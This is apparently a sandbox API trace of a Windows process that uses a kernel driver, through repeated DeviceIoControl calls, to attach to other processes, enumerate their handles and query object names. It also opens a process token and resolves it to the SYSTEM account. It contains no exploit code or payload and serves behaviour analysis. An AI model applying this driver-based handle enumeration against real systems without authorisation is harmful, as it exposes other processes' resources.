[0220.715] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0220.715] ObQueryNameString (in: Object=0xfffffa8003767ba0, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.716] ObfDereferenceObject (Object=0xfffffa8003767ba0) returned 0x2 [0220.716] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.716] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.716] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.716] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0220.716] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.716] PsAcquireProcessExitSynchronization () returned 0x0 [0220.716] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880052b35d0) [0220.716] ObReferenceObjectByHandle (in: Handle=0x14c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003760f20, HandleInformation=0x0) returned 0x0 [0220.716] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.716] PsReleaseProcessExitSynchronization () returned 0x2 [0220.716] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0220.716] ObQueryNameString (in: Object=0xfffffa8003760f20, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.716] ObfDereferenceObject (Object=0xfffffa8003760f20) returned 0x2 [0220.716] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.717] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.717] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.717] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0220.717] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.717] PsAcquireProcessExitSynchronization () returned 0x0 [0220.717] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880052b35d0) [0220.717] ObReferenceObjectByHandle (in: Handle=0x150, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003769e20, HandleInformation=0x0) returned 0x0 [0220.717] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.717] PsReleaseProcessExitSynchronization () returned 0x2 [0220.717] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0220.717] ObQueryNameString (in: Object=0xfffffa8003769e20, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.717] ObfDereferenceObject (Object=0xfffffa8003769e20) returned 0x2 [0220.717] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.717] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0xc8 [0220.718] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0220.718] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80018b95d0, HandleInformation=0x0) returned 0x0 [0220.718] ObOpenObjectByPointer (in: Object=0xfffffa80018b95d0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800007c8) returned 0x0 [0220.718] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x181 [0220.718] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c8, DesiredAccess=0x8, TokenHandle=0xfffffa8001ec6500 | out: TokenHandle=0xfffffa8001ec6500*=0xc4) returned 0x0 [0220.718] ZwClose (Handle=0xffffffff800007c8) returned 0x0 [0220.718] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.718] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0220.718] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0221.348] CloseHandle (hObject=0xc4) returned 1 [0221.349] CloseHandle (hObject=0xc8) returned 1 [0221.349] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.349] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0221.349] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.349] PsAcquireProcessExitSynchronization () returned 0x0 [0221.349] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.349] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003558f20, HandleInformation=0x0) returned 0x0 [0221.349] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.349] PsReleaseProcessExitSynchronization () returned 0x2 [0221.349] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.349] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3508) returned 0x0 [0221.349] ObfDereferenceObject (Object=0xfffffa8003558f20) returned 0x1 [0221.349] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.349] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.349] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.349] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x4c, lpOverlapped=0x0) returned 1 [0221.349] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.350] PsAcquireProcessExitSynchronization () returned 0x0 [0221.350] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.350] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0044997a0, HandleInformation=0x0) returned 0x0 [0221.350] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.350] PsReleaseProcessExitSynchronization () returned 0x2 [0221.350] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.350] ObQueryNameString (in: Object=0xfffff8a0044997a0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.350] ObfDereferenceObject (Object=0xfffff8a0044997a0) returned 0x2 [0221.350] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.350] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.350] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.350] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0221.350] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.350] PsAcquireProcessExitSynchronization () returned 0x0 [0221.350] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.350] ObReferenceObjectByHandle (in: Handle=0xb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800358d580, HandleInformation=0x0) returned 0x0 [0221.350] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.350] PsReleaseProcessExitSynchronization () returned 0x2 [0221.350] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.351] ObQueryNameString (in: Object=0xfffffa800358d580, ObjectNameInfo=0xfffffa800315b7c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800315b7c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.351] ObfDereferenceObject (Object=0xfffffa800358d580) returned 0x2 [0221.351] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.351] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.351] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.351] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0221.351] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.351] PsAcquireProcessExitSynchronization () returned 0x0 [0221.351] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.351] ObReferenceObjectByHandle (in: Handle=0xb8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036e58e0, HandleInformation=0x0) returned 0x0 [0221.351] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.351] PsReleaseProcessExitSynchronization () returned 0x2 [0221.351] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.351] ObQueryNameString (in: Object=0xfffffa80036e58e0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.352] ObfDereferenceObject (Object=0xfffffa80036e58e0) returned 0x2 [0221.352] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.352] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.352] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.352] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0221.352] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.352] PsAcquireProcessExitSynchronization () returned 0x0 [0221.352] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.352] ObReferenceObjectByHandle (in: Handle=0xc0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002912a20, HandleInformation=0x0) returned 0x0 [0221.352] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.352] PsReleaseProcessExitSynchronization () returned 0x2 [0221.352] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.352] ObQueryNameString (in: Object=0xfffffa8002912a20, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.352] ObfDereferenceObject (Object=0xfffffa8002912a20) returned 0x2 [0221.352] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.352] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.353] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.353] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0221.353] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.353] PsAcquireProcessExitSynchronization () returned 0x0 [0221.353] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.353] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800356df20, HandleInformation=0x0) returned 0x0 [0221.353] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.353] PsReleaseProcessExitSynchronization () returned 0x2 [0221.353] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.353] ObQueryNameString (in: Object=0xfffffa800356df20, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.353] ObfDereferenceObject (Object=0xfffffa800356df20) returned 0x2 [0221.353] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.353] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.353] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.353] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.354] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.354] PsAcquireProcessExitSynchronization () returned 0x0 [0221.354] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.354] ObReferenceObjectByHandle (in: Handle=0xd0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0013db060, HandleInformation=0x0) returned 0x0 [0221.354] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.354] PsReleaseProcessExitSynchronization () returned 0x2 [0221.354] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.354] ObQueryNameString (in: Object=0xfffff8a0013db060, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.354] ObfDereferenceObject (Object=0xfffff8a0013db060) returned 0x1 [0221.354] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.354] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.354] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.355] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.355] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.355] PsAcquireProcessExitSynchronization () returned 0x0 [0221.355] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.355] ObReferenceObjectByHandle (in: Handle=0xe4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0012de480, HandleInformation=0x0) returned 0x0 [0221.355] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.355] PsReleaseProcessExitSynchronization () returned 0x2 [0221.355] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.355] ObQueryNameString (in: Object=0xfffff8a0012de480, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.355] ObfDereferenceObject (Object=0xfffff8a0012de480) returned 0x1 [0221.355] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.356] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.356] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.356] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0221.356] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.356] PsAcquireProcessExitSynchronization () returned 0x0 [0221.356] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.356] ObReferenceObjectByHandle (in: Handle=0xe8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800379d920, HandleInformation=0x0) returned 0x0 [0221.356] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.356] PsReleaseProcessExitSynchronization () returned 0x2 [0221.356] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.356] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3508) returned 0x0 [0221.356] ObfDereferenceObject (Object=0xfffffa800379d920) returned 0x1 [0221.356] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.356] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.356] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.357] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.357] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.357] PsAcquireProcessExitSynchronization () returned 0x0 [0221.357] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.357] ObReferenceObjectByHandle (in: Handle=0xf4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000c49060, HandleInformation=0x0) returned 0x0 [0221.357] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.357] PsReleaseProcessExitSynchronization () returned 0x2 [0221.357] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.357] ObQueryNameString (in: Object=0xfffff8a000c49060, ObjectNameInfo=0xfffffa800307c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.357] ObfDereferenceObject (Object=0xfffff8a000c49060) returned 0x1 [0221.357] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.357] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.357] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.358] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.358] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.358] PsAcquireProcessExitSynchronization () returned 0x0 [0221.358] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.358] ObReferenceObjectByHandle (in: Handle=0xf8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000c4a5e0, HandleInformation=0x0) returned 0x0 [0221.358] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.358] PsReleaseProcessExitSynchronization () returned 0x2 [0221.358] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.358] ObQueryNameString (in: Object=0xfffff8a000c4a5e0, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.358] ObfDereferenceObject (Object=0xfffff8a000c4a5e0) returned 0x1 [0221.358] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.358] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.359] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.359] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.359] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.359] PsAcquireProcessExitSynchronization () returned 0x0 [0221.359] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.359] ObReferenceObjectByHandle (in: Handle=0xfc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000c4b330, HandleInformation=0x0) returned 0x0 [0221.359] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.359] PsReleaseProcessExitSynchronization () returned 0x2 [0221.359] ObfDereferenceObject 